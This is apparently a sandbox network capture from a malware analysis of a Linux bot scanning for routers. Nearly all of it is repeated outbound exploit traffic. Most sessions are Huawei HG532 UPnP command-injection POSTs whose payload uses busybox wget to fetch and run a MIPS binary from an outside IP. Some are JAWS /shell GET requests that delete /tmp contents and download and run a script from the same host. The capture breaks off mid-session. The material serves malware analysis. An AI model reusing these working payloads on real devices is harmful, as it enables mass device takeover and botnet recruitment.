                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    91192.168.2.2344818197.179.146.19837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805250883 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    92192.168.2.2337894197.57.152.22737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805340052 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    93192.168.2.234266841.51.237.6337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805433035 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    94192.168.2.2360860197.201.203.20037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.805517912 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    95192.168.2.2336916197.198.188.2037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:53.823390007 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Dec 3, 2024 23:01:54.466016054 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    96192.168.2.2343294156.208.58.15237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.886209011 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    97192.168.2.2355660197.174.22.10937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899735928 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    98192.168.2.2342998184.145.222.8880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899782896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    99192.168.2.2345290156.85.239.22237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899818897 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    100192.168.2.233867057.16.75.1880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899832964 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    101192.168.2.235966040.208.105.23580
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899858952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    102192.168.2.2333060156.191.133.12137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.899981976 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
